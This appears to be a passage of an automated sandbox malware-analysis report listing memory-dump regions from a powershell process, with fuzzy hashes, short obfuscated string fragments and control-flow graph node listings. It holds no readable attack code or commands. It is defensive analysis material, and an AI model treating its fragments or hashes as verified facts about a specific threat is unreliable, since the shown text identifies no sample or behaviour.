                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$(fyl$4'eq$tLkk$x.jk$-jk
                                                                  • API String ID: 0-1258555554
                                                                  • Opcode ID: 7ffccf42594ccca85bbd21f3eabf535ccef0ec862e12a6ba411b973f50475f6a
                                                                  • Instruction ID: 074d3a0daece537f90115a90f1a164eb01f381542e68cf9fb92d20f6f9bc8878
                                                                  • Opcode Fuzzy Hash: 7ffccf42594ccca85bbd21f3eabf535ccef0ec862e12a6ba411b973f50475f6a
                                                                  • Instruction Fuzzy Hash: 2642B4B0B012159FD724DF68C950BEEB7B2AF89304F5085A9D81A6B781CB31ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4vl$tLkk$x.jk
                                                                  • API String ID: 0-1306940529
                                                                  • Opcode ID: b8bbf4f56ce8101e7df7b2fa43163a53f83744189bc2ee835c5fec1c1f571195
                                                                  • Instruction ID: 98b32caf7a46c17d37b52daf930ea0a976676af95e3b077c732570a01a92c1a8
                                                                  • Opcode Fuzzy Hash: b8bbf4f56ce8101e7df7b2fa43163a53f83744189bc2ee835c5fec1c1f571195
                                                                  • Instruction Fuzzy Hash: 9E124AB0A00215DFDB25DB24C981BADB7B6BF45308F1088E9D41AAB790DB71EE81CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl$(fyl$4'eq$4vl$tLkk$x.jk
                                                                  • API String ID: 0-1306940529
                                                                  • Opcode ID: b3e97a1c2f8fb35c5105c4f0a96501fe3cd61c6e4081a7c8e9f7a0f36d0cefad
                                                                  • Instruction ID: 0e985bd9d59a4ba0dbeb89f06db75dbacd44aefc971de2665261a30670d5f738
                                                                  • Opcode Fuzzy Hash: b3e97a1c2f8fb35c5105c4f0a96501fe3cd61c6e4081a7c8e9f7a0f36d0cefad
                                                                  • Instruction Fuzzy Hash: FE1229B0A00215DFDB25DB24C981BADB7B6BF45308F1088E9D51AAB790DB71EE81CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3241 79781a8-79781d5 3244 79781d7-79781dd 3241->3244 3245 79781ed-7978240 3241->3245 3246 79781e1-79781eb 3244->3246 3247 79781df 3244->3247 3252 7978242-7978261 3245->3252 3253 7978269-7978273 3245->3253 3246->3245 3247->3245 3252->3253 3254 7978724-7978769 3253->3254 3255 7978279-797828d 3253->3255 3277 7978792-79787ec 3254->3277 3278 797876b-797878a 3254->3278 3255->3254 3257 7978293-7978298 3255->3257 3258 79782b0-79782bc 3257->3258 3259 797829a-79782a0 3257->3259 3258->3254 3263 79782c2-79782c7 3258->3263 3261 79782a4-79782ae 3259->3261 3262 79782a2 3259->3262 3261->3258 3262->3258 3264 79782df-79782eb 3263->3264 3265 79782c9-79782cf 3263->3265 3264->3254 3270 79782f1-7978338 3264->3270 3268 79782d3-79782dd 3265->3268 3269 79782d1 3265->3269 3268->3264 3269->3264 3281 7978352-797837e 3270->3281 3282 797833a-7978340 3270->3282 3292 7978775 3277->3292 3293 79787ee-79787fe 3277->3293 3278->3277 3281->3254 3299 7978384-7978389 3281->3299 3284 7978344-7978350 3282->3284 3285 7978342 3282->3285 3284->3281 3285->3281 3297 7978777 3292->3297 3298 797877e-797878a 3292->3298 3295 7978807-797882c 3293->3295 3296 7978800-7978806 3293->3296 3300 7978844-7978870 3295->3300 3301 797882e-7978834 3295->3301 3296->3295 3297->3298 3298->3277 3302 79783a1-7978432 3299->3302 3303 797838b-7978391 3299->3303 3315 7978877-797887e 3300->3315 3306 7978836 3301->3306 3307 7978838-7978842 3301->3307 3351 79785d7-79785fc 3302->3351 3352 7978438-797846c 3302->3352 3304 7978395-797839f 3303->3304 3305 7978393 3303->3305 3304->3302 3305->3302 3306->3300 3307->3300 3316 7978a25-7978a51 3315->3316 3317 7978884-7978889 3315->3317 3346 7978a56-7978a8e 3316->3346 3318 79788a1-79788b1 3317->3318 3319 797888b-7978891 3317->3319 3318->3316 3323 79788b7-79788c2 3318->3323 3321 7978895-797889f 3319->3321 3322 7978893 3319->3322 3321->3318 3322->3318 3325 79788c4-79788ca 3323->3325 3326 79788da-79788ea 3323->3326 3329 79788ce-79788d8 3325->3329 3330 79788cc 3325->3330 3326->3316 3332 79788f0-79788f5 3326->3332 3329->3326 3330->3326 3333 79788f7-79788fd 3332->3333 3334 797890d-7978917 3332->3334 3338 7978901-797890b 3333->3338 3339 79788ff 3333->3339 3334->3316 3340 797891d-7978938 3334->3340 3338->3334 3339->3334 3347 7978952-7978968 3340->3347 3348 797893a-7978940 3340->3348 3372 7978a8f 3346->3372 3347->3316 3356 797896e-7978973 3347->3356 3349 7978944-7978950 3348->3349 3350 7978942 3348->3350 3349->3347 3350->3347 3373 7978601-7978646 3351->3373 3352->3351 3368 7978472-7978493 3352->3368 3360 7978975-797897b 3356->3360 3361 797898b-7978995 3356->3361 3363 797897f-7978989 3360->3363 3364 797897d 3360->3364 3361->3316 3365 797899b-79789b9 3361->3365 3363->3361 3364->3361 3375 79789d3-7978a23 3365->3375 3376 79789bb-79789c1 3365->3376 3377 7978495-797849b 3368->3377 3378 79784ad-79784af 3368->3378 3372->3372 3373->3254 3375->3346 3379 79789c5-79789d1 3376->3379 3380 79789c3 3376->3380 3382 797849f-79784ab 3377->3382 3383 797849d 3377->3383 3384 79784b1-79784b7 3378->3384 3385 79784c9-79784eb 3378->3385 3379->3375 3380->3375 3382->3378 3383->3378 3389 79784bb-79784c7 3384->3389 3390 79784b9 3384->3390 3385->3351 3398 79784f1-7978512 3385->3398 3389->3385 3390->3385 3403 7978514-797851a 3398->3403 3404 797852c-797852e 3398->3404 3405 797851e-797852a 3403->3405 3406 797851c 3403->3406 3407 7978530-7978536 3404->3407 3408 7978548-7978593 3404->3408 3405->3404 3406->3404 3409 797853a-7978546 3407->3409 3410 7978538 3407->3410 3408->3351 3417 7978595-79785ab 3408->3417 3409->3408 3410->3408 3419 79785b5-79785d5 3417->3419 3419->3373
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$4'eq$4'eq$4'eq$4'eq$x.jk$-jk
                                                                  • API String ID: 0-2517305658
                                                                  • Opcode ID: 253f9b960c7b37f921439e470fec4972225b153aa1b65ec443cddc9b92328c3f
                                                                  • Instruction ID: 756c05a057a914a47c80ffeaae9d8d32e0cc90341f65479ac0b1a2568bfecb56
                                                                  • Opcode Fuzzy Hash: 253f9b960c7b37f921439e470fec4972225b153aa1b65ec443cddc9b92328c3f
                                                                  • Instruction Fuzzy Hash: 86E188B4B002059FCB14DB68D545FAEBBB6AF88318F24C469D9026F795CB71EC81CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq$$eq$$eq$$eq
                                                                  • API String ID: 0-2942138008
                                                                  • Opcode ID: 4a0519168871018cf77af66dc9d2691cfd81523dbf8df3e4762e20ccd3fb8546
                                                                  • Instruction ID: 72ac29d00f27c4961446f1153c97b9f31330895869348f603adf0ce2bb260975
                                                                  • Opcode Fuzzy Hash: 4a0519168871018cf77af66dc9d2691cfd81523dbf8df3e4762e20ccd3fb8546
                                                                  • Instruction Fuzzy Hash: 09121571B042458FCF25DF68C521E6ABBE2BF85390B1480AAE605CF356DB31DD46CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3605 7978184-79781a2 3606 79781a4-79781a6 3605->3606 3607 79781ab-79781ae 3605->3607 3608 79781af-79781d5 3606->3608 3609 79781a8-79781a9 3606->3609 3607->3608 3610 79781d7-79781dd 3608->3610 3611 79781ed-7978240 3608->3611 3609->3607 3612 79781e1-79781eb 3610->3612 3613 79781df 3610->3613 3618 7978242-7978261 3611->3618 3619 7978269-7978273 3611->3619 3612->3611 3613->3611 3618->3619 3620 7978724-7978769 3619->3620 3621 7978279-797828d 3619->3621 3643 7978792-79787ec 3620->3643 3644 797876b-797878a 3620->3644 3621->3620 3623 7978293-7978298 3621->3623 3624 79782b0-79782bc 3623->3624 3625 797829a-79782a0 3623->3625 3624->3620 3629 79782c2-79782c7 3624->3629 3627 79782a4-79782ae 3625->3627 3628 79782a2 3625->3628 3627->3624 3628->3624 3630 79782df-79782eb 3629->3630 3631 79782c9-79782cf 3629->3631 3630->3620 3636 79782f1-7978338 3630->3636 3634 79782d3-79782dd 3631->3634 3635 79782d1 3631->3635 3634->3630 3635->3630 3647 7978352-797837e 3636->3647 3648 797833a-7978340 3636->3648 3658 7978775 3643->3658 3659 79787ee-79787fe 3643->3659 3644->3643 3647->3620 3665 7978384-7978389 3647->3665 3650 7978344-7978350 3648->3650 3651 7978342 3648->3651 3650->3647 3651->3647 3663 7978777 3658->3663 3664 797877e-797878a 3658->3664 3661 7978807-797882c 3659->3661 3662 7978800-7978806 3659->3662 3666 7978844-797885e 3661->3666 3667 797882e-7978834 3661->3667 3662->3661 3663->3664 3664->3643 3668 79783a1-7978432 3665->3668 3669 797838b-7978391 3665->3669 3679 7978868-7978870 3666->3679 3672 7978836 3667->3672 3673 7978838-7978842 3667->3673 3717 79785d7-79785fc 3668->3717 3718 7978438-797846c 3668->3718 3670 7978395-797839f 3669->3670 3671 7978393 3669->3671 3670->3668 3671->3668 3672->3666 3673->3666 3681 7978877-797887e 3679->3681 3682 7978a25-7978a51 3681->3682 3683 7978884-7978889 3681->3683 3712 7978a56-7978a8e 3682->3712 3684 79788a1-79788b1 3683->3684 3685 797888b-7978891 3683->3685 3684->3682 3689 79788b7-79788c2 3684->3689 3687 7978895-797889f 3685->3687 3688 7978893 3685->3688 3687->3684 3688->3684 3691 79788c4-79788ca 3689->3691 3692 79788da-79788ea 3689->3692 3695 79788ce-79788d8 3691->3695 3696 79788cc 3691->3696 3692->3682 3698 79788f0-79788f5 3692->3698 3695->3692 3696->3692 3699 79788f7-79788fd 3698->3699 3700 797890d-7978917 3698->3700 3704 7978901-797890b 3699->3704 3705 79788ff 3699->3705 3700->3682 3706 797891d-7978938 3700->3706 3704->3700 3705->3700 3713 7978952-7978968 3706->3713 3714 797893a-7978940 3706->3714 3738 7978a8f 3712->3738 3713->3682 3722 797896e-7978973 3713->3722 3715 7978944-7978950 3714->3715 3716 7978942 3714->3716 3715->3713 3716->3713 3739 7978601-7978646 3717->3739 3718->3717 3734 7978472-7978493 3718->3734 3726 7978975-797897b 3722->3726 3727 797898b-7978995 3722->3727 3729 797897f-7978989 3726->3729 3730 797897d 3726->3730 3727->3682 3731 797899b-79789b9 3727->3731 3729->3727 3730->3727 3741 79789d3-7978a23 3731->3741 3742 79789bb-79789c1 3731->3742 3743 7978495-797849b 3734->3743 3744 79784ad-79784af 3734->3744 3738->3738 3739->3620 3741->3712 3745 79789c5-79789d1 3742->3745 3746 79789c3 3742->3746 3748 797849f-79784ab 3743->3748 3749 797849d 3743->3749 3750 79784b1-79784b7 3744->3750 3751 79784c9-79784eb 3744->3751 3745->3741 3746->3741 3748->3744 3749->3744 3755 79784bb-79784c7 3750->3755 3756 79784b9 3750->3756 3751->3717 3764 79784f1-7978512 3751->3764 3755->3751 3756->3751 3769 7978514-797851a 3764->3769 3770 797852c-797852e 3764->3770 3771 797851e-797852a 3769->3771 3772 797851c 3769->3772 3773 7978530-7978536 3770->3773 3774 7978548-7978593 3770->3774 3771->3770 3772->3770 3775 797853a-7978546 3773->3775 3776 7978538 3773->3776 3774->3717 3783 7978595-7978598 3774->3783 3775->3774 3776->3774 3784 79785a2-79785ab 3783->3784 3785 79785b5-79785d5 3784->3785 3785->3739
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$4'eq$4'eq$x.jk$-jk
                                                                  • API String ID: 0-4000863024
                                                                  • Opcode ID: 2a98f56a50eeaf28095419ac152e8322ca93222860a1548b694b69285af144de
                                                                  • Instruction ID: 8d066fa9bef0c2f189f89c20aef7a0c17e4c89f313263737a633d03458299158
                                                                  • Opcode Fuzzy Hash: 2a98f56a50eeaf28095419ac152e8322ca93222860a1548b694b69285af144de
                                                                  • Instruction Fuzzy Hash: 10C189B4A002059FCB14CF58D545F9EBBB6AF88318F14C469D9056F396CB71EC81CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3788 96f1c7e-96f1c81 3789 96f1c87-96f1c8f 3788->3789 3790 96f1c83-96f1c85 3788->3790 3791 96f1ca7-96f1cab 3789->3791 3792 96f1c91-96f1c95 3789->3792 3790->3789 3795 96f1ece-96f1ed8 3791->3795 3796 96f1cb1-96f1cb5 3791->3796 3793 96f1c97 3792->3793 3794 96f1d03-96f1d0c 3792->3794 3797 96f1c9b-96f1ca5 3793->3797 3798 96f1c99 3793->3798 3799 96f1d0e-96f1d17 3794->3799 3800 96f1cf7-96f1d00 3794->3800 3803 96f1eda-96f1ee3 3795->3803 3804 96f1ee6-96f1eec 3795->3804 3801 96f1cc8 3796->3801 3802 96f1cb7-96f1cc6 3796->3802 3797->3791 3798->3791 3813 96f1d19-96f1d1f 3799->3813 3814 96f1d31-96f1d50 3799->3814 3800->3794 3805 96f1db8-96f1e07 3800->3805 3806 96f1cca-96f1ccc 3801->3806 3802->3806 3807 96f1eee-96f1ef0 3804->3807 3808 96f1ef2-96f1efe 3804->3808 3841 96f1e0e-96f1e14 3805->3841 3806->3795 3811 96f1cd2-96f1cd6 3806->3811 3812 96f1f00-96f1f23 3807->3812 3808->3812 3815 96f1ce9 3811->3815 3816 96f1cd8-96f1ce7 3811->3816 3820 96f1d23-96f1d2f 3813->3820 3821 96f1d21 3813->3821 3814->3805 3828 96f1d52-96f1d72 3814->3828 3822 96f1ceb-96f1ced 3815->3822 3816->3822 3820->3814 3821->3814 3822->3795 3823 96f1cf3-96f1cf6 3822->3823 3823->3800 3831 96f1d8c-96f1da5 3828->3831 3832 96f1d74-96f1d7a 3828->3832 3839 96f1da7-96f1da9 3831->3839 3840 96f1db3-96f1db6 3831->3840 3834 96f1d7e-96f1d8a 3832->3834 3835 96f1d7c 3832->3835 3834->3831 3835->3831 3839->3840 3840->3841 3842 96f1e37 3841->3842 3843 96f1e16-96f1e1f 3841->3843 3844 96f1e3a-96f1e43 3842->3844 3845 96f1e26-96f1e33 3843->3845 3846 96f1e21-96f1e24 3843->3846 3847 96f1e45-96f1e48 3844->3847 3848 96f1e52-96f1e6a 3844->3848 3849 96f1e35 3845->3849 3846->3849 3847->3848 3852 96f1e6f-96f1ecb 3848->3852 3849->3844
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2654340763.00000000096F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 096F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_96f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84wl$84wl$tPeq$tPeq
                                                                  • API String ID: 0-931831179
                                                                  • Opcode ID: eb97d9ae13a60c346f7ed51d52cb814420a808ce2c28fe0163993c327de5f01b
                                                                  • Instruction ID: 3a3c3884c2a99d8f79bf3997e9cfc9beff9eba2a13bc324d5e4ee13b2b77a6a6
                                                                  • Opcode Fuzzy Hash: eb97d9ae13a60c346f7ed51d52cb814420a808ce2c28fe0163993c327de5f01b
                                                                  • Instruction Fuzzy Hash: 56711435A04204DFCB158F58C4616AABBF2FF8A390F568469EA159F381DB31DD42CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3854 7978800-797882c 3856 7978844-797885e 3854->3856 3857 797882e-7978834 3854->3857 3862 7978868-7978870 3856->3862 3858 7978836 3857->3858 3859 7978838-7978842 3857->3859 3858->3856 3859->3856 3863 7978877-797887e 3862->3863 3864 7978a25-7978a51 3863->3864 3865 7978884-7978889 3863->3865 3889 7978a56-7978a8e 3864->3889 3866 79788a1-79788b1 3865->3866 3867 797888b-7978891 3865->3867 3866->3864 3870 79788b7-79788c2 3866->3870 3868 7978895-797889f 3867->3868 3869 7978893 3867->3869 3868->3866 3869->3866 3872 79788c4-79788ca 3870->3872 3873 79788da-79788ea 3870->3873 3875 79788ce-79788d8 3872->3875 3876 79788cc 3872->3876 3873->3864 3878 79788f0-79788f5 3873->3878 3875->3873 3876->3873 3879 79788f7-79788fd 3878->3879 3880 797890d-7978917 3878->3880 3883 7978901-797890b 3879->3883 3884 79788ff 3879->3884 3880->3864 3885 797891d-7978938 3880->3885 3883->3880 3884->3880 3890 7978952-7978968 3885->3890 3891 797893a-7978940 3885->3891 3907 7978a8f 3889->3907 3890->3864 3896 797896e-7978973 3890->3896 3892 7978944-7978950 3891->3892 3893 7978942 3891->3893 3892->3890 3893->3890 3899 7978975-797897b 3896->3899 3900 797898b-7978995 3896->3900 3901 797897f-7978989 3899->3901 3902 797897d 3899->3902 3900->3864 3903 797899b-79789b9 3900->3903 3901->3900 3902->3900 3908 79789d3-7978a23 3903->3908 3909 79789bb-79789c1 3903->3909 3907->3907 3908->3889 3910 79789c5-79789d1 3909->3910 3911 79789c3 3909->3911 3910->3908 3911->3908
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl$(fyl$(fyl
                                                                  • API String ID: 0-4278018943
                                                                  • Opcode ID: 2664fa38e9e3e7310e6694ef355f3d3b997b2971db47f83066bc077a08990acc
                                                                  • Instruction ID: 9676e8e25407672f2f9c239cd8eaf548b0d728ed215efdf3d1385a1c0100817f
                                                                  • Opcode Fuzzy Hash: 2664fa38e9e3e7310e6694ef355f3d3b997b2971db47f83066bc077a08990acc
                                                                  • Instruction Fuzzy Hash: E2718BB0A00105DFCB14CF58D549EAEBBB6FF89318F148169D915AB355CB32ED41CB92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3917 7973e00-7973e21 3918 7973e23-7973e2f 3917->3918 3919 7973e31 3917->3919 3920 7973e33-7973e35 3918->3920 3919->3920 3921 7973f15-7973f1f 3920->3921 3922 7973e3b-7973e3d 3920->3922 3925 7973f21-7973f2a 3921->3925 3926 7973f2d-7973f33 3921->3926 3923 7973e3f-7973e4b 3922->3923 3924 7973e4d 3922->3924 3927 7973e4f-7973e51 3923->3927 3924->3927 3928 7973f35-7973f37 3926->3928 3929 7973f39-7973f45 3926->3929 3927->3921 3930 7973e57-7973e59 3927->3930 3931 7973f47-7973f63 3928->3931 3929->3931 3932 7973e73-7973e7f 3930->3932 3933 7973e5b-7973e61 3930->3933 3937 7973e81-7973e83 3932->3937 3938 7973e8d-7973e92 3932->3938 3935 7973e65-7973e71 3933->3935 3936 7973e63 3933->3936 3935->3932 3936->3932 3937->3938 3940 7973e97-7973ea6 3938->3940 3941 7973e94 3938->3941 3945 7973eb5 3940->3945 3946 7973ea8-7973eb3 3940->3946 3941->3940 3948 7973eba-7973efb 3945->3948 3947 7973f09-7973f12 3946->3947 3953 7973f02 3948->3953 3954 7973efd 3948->3954 3953->3947 3954->3953
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $eq$$eq$$eq
                                                                  • API String ID: 0-177832560
                                                                  • Opcode ID: 97f6a6b8a661baf71b6c4cdc2c561e5bea5a9af3a8e5fa5daa97d0f2b6bf26c8
                                                                  • Instruction ID: 0d2af661c5a48b9af893a47c63536016e8ef39e1e3480ae374426cac7548693d
                                                                  • Opcode Fuzzy Hash: 97f6a6b8a661baf71b6c4cdc2c561e5bea5a9af3a8e5fa5daa97d0f2b6bf26c8
                                                                  • Instruction Fuzzy Hash: B24158F2B00166DBCB609E69D80126FFBB5AFC4254B24842AD815EB341EB32DD00D7E1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 3955 7974548-7974568 3957 797456e-7974573 3955->3957 3958 7974c1d-7974c2b 3955->3958 3959 7974575-797457b 3957->3959 3960 797458b-7974592 3957->3960 3961 797457f-7974589 3959->3961 3962 797457d 3959->3962 3960->3958 3963 7974598-797459d 3960->3963 3961->3960 3962->3960 3965 79745b5-79745bc 3963->3965 3966 797459f-79745a5 3963->3966 3965->3958 3970 79745c2-79745c7 3965->3970 3968 79745a7 3966->3968 3969 79745a9-79745b3 3966->3969 3968->3965 3969->3965 3971 79745df 3970->3971 3972 79745c9-79745cf 3970->3972 3976 79745e2-79745ec 3971->3976 3974 79745d3-79745dd 3972->3974 3975 79745d1 3972->3975 3974->3971 3975->3971 3976->3958 3977 79745f2-79745f7 3976->3977 3979 797460f-797462d 3977->3979 3980 79745f9-79745ff 3977->3980 3981 797462f-7974658 3979->3981 3982 797465b-7974665 3979->3982 3983 7974603-797460d 3980->3983 3984 7974601 3980->3984 3981->3982 3982->3958 3985 797466b-7974670 3982->3985 3983->3979 3984->3979 3988 7974672-7974678 3985->3988 3989 7974688-79746cd 3985->3989 3990 797467c-7974686 3988->3990 3991 797467a 3988->3991 4079 79746d0 call 7973e00 3989->4079 4080 79746d0 call 7973deb 3989->4080 3990->3989 3991->3989 3996 79746d2-79746e2 3998 7974c02-7974c0e 3996->3998 3999 79746e8-7974708 3996->3999 4002 797470b-7974711 3999->4002 4003 7974713 4002->4003 4004 797471a-7974735 4002->4004 4003->4004 4005 79748df-79748fa 4003->4005 4006 797499c-79749b7 4003->4006 4007 7974737-7974756 4004->4007 4008 797475e-7974768 4004->4008 4011 7974923-7974941 4005->4011 4012 79748fc-797491b 4005->4012 4013 79749e0-79749ea 4006->4013 4014 79749b9-79749d8 4006->4014 4007->4008 4009 797476e-7974773 4008->4009 4010 7974ada-7974b0b 4008->4010 4015 7974775-797477b 4009->4015 4016 797478b-797479a 4009->4016 4010->4002 4067 7974b10 4010->4067 4030 7974943-7974949 4011->4030 4031 797495b-7974995 4011->4031 4012->4011 4013->4010 4017 79749f0-79749f5 4013->4017 4014->4013 4019 797477f-7974789 4015->4019 4020 797477d 4015->4020 4016->4010 4022 79747a0-79747a8 4016->4022 4025 79749f7-79749fd 4017->4025 4026 7974a0d-7974a1f 4017->4026 4019->4016 4020->4016 4028 79747c0-79747f1 4022->4028 4029 79747aa-79747b0 4022->4029 4032 7974a01-7974a0b 4025->4032 4033 79749ff 4025->4033 4026->4010 4034 7974a25-7974a2c 4026->4034 4028->4010 4051 79747f7-79747fe 4028->4051 4036 79747b4-79747be 4029->4036 4037 79747b2 4029->4037 4039 797494d-7974959 4030->4039 4040 797494b 4030->4040 4031->4006 4032->4026 4033->4026 4041 7974a44-7974ad8 4034->4041 4042 7974a2e-7974a34 4034->4042 4036->4028 4037->4028 4039->4031 4040->4031 4041->4067 4046 7974a36 4042->4046 4047 7974a38-7974a42 4042->4047 4046->4041 4047->4041 4053 7974816-797488b 4051->4053 4054 7974800-7974806 4051->4054 4073 7974890-79748d8 4053->4073 4059 797480a-7974814 4054->4059 4060 7974808 4054->4060 4059->4053 4060->4053 4067->3976 4073->4005 4079->3996 4080->3996
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'eq$4'eq
                                                                  • API String ID: 0-907361030
                                                                  • Opcode ID: f5c3cf1559547bff3d2b418171412bfdfd35007c5212647507fda763a28926a0
                                                                  • Instruction ID: 6d015f81222d2c0bd6fa402277de98555379b30dfc3016aecbb063d7a28a9417
                                                                  • Opcode Fuzzy Hash: f5c3cf1559547bff3d2b418171412bfdfd35007c5212647507fda763a28926a0
                                                                  • Instruction Fuzzy Hash: 42027AB0B002459FDB14CB58D541AAABBB7EB89318F14C069E9059F366CB72EC41CBA1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 4215 79787dd-79787ec 4216 7978775 4215->4216 4217 79787ee-79787fe 4215->4217 4220 7978777 4216->4220 4221 797877e-79787ca 4216->4221 4218 7978807-797882c 4217->4218 4219 7978800-7978806 4217->4219 4222 7978844-797885e 4218->4222 4223 797882e-7978834 4218->4223 4219->4218 4220->4221 4221->4215 4230 7978868-7978870 4222->4230 4224 7978836 4223->4224 4225 7978838-7978842 4223->4225 4224->4222 4225->4222 4233 7978877-797887e 4230->4233 4234 7978a25-7978a51 4233->4234 4235 7978884-7978889 4233->4235 4259 7978a56-7978a8e 4234->4259 4236 79788a1-79788b1 4235->4236 4237 797888b-7978891 4235->4237 4236->4234 4240 79788b7-79788c2 4236->4240 4238 7978895-797889f 4237->4238 4239 7978893 4237->4239 4238->4236 4239->4236 4242 79788c4-79788ca 4240->4242 4243 79788da-79788ea 4240->4243 4245 79788ce-79788d8 4242->4245 4246 79788cc 4242->4246 4243->4234 4248 79788f0-79788f5 4243->4248 4245->4243 4246->4243 4249 79788f7-79788fd 4248->4249 4250 797890d-7978917 4248->4250 4253 7978901-797890b 4249->4253 4254 79788ff 4249->4254 4250->4234 4255 797891d-7978938 4250->4255 4253->4250 4254->4250 4260 7978952-7978968 4255->4260 4261 797893a-7978940 4255->4261 4277 7978a8f 4259->4277 4260->4234 4266 797896e-7978973 4260->4266 4262 7978944-7978950 4261->4262 4263 7978942 4261->4263 4262->4260 4263->4260 4269 7978975-797897b 4266->4269 4270 797898b-7978995 4266->4270 4271 797897f-7978989 4269->4271 4272 797897d 4269->4272 4270->4234 4273 797899b-79789b9 4270->4273 4271->4270 4272->4270 4278 79789d3-7978a23 4273->4278 4279 79789bb-79789c1 4273->4279 4277->4277 4278->4259 4280 79789c5-79789d1 4279->4280 4281 79789c3 4279->4281 4280->4278 4281->4278
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2647967633.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_7970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fyl$(fyl
                                                                  • API String ID: 0-1745260987
                                                                  • Opcode ID: 94b43c9c5dd94820f245b46096b33c9529fb4c5029db54f484a1f4c6132e324e
                                                                  • Instruction ID: 61dd871962d9cb764b4aee51189f9c78bdfb5a520094d0197600a0b90d8d2a0e
                                                                  • Opcode Fuzzy Hash: 94b43c9c5dd94820f245b46096b33c9529fb4c5029db54f484a1f4c6132e324e
                                                                  • Instruction Fuzzy Hash: 15819CB4A00206DFCB15CF54D588EAABBB6FF89318F24C16AD915AB351C732ED41CB91

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
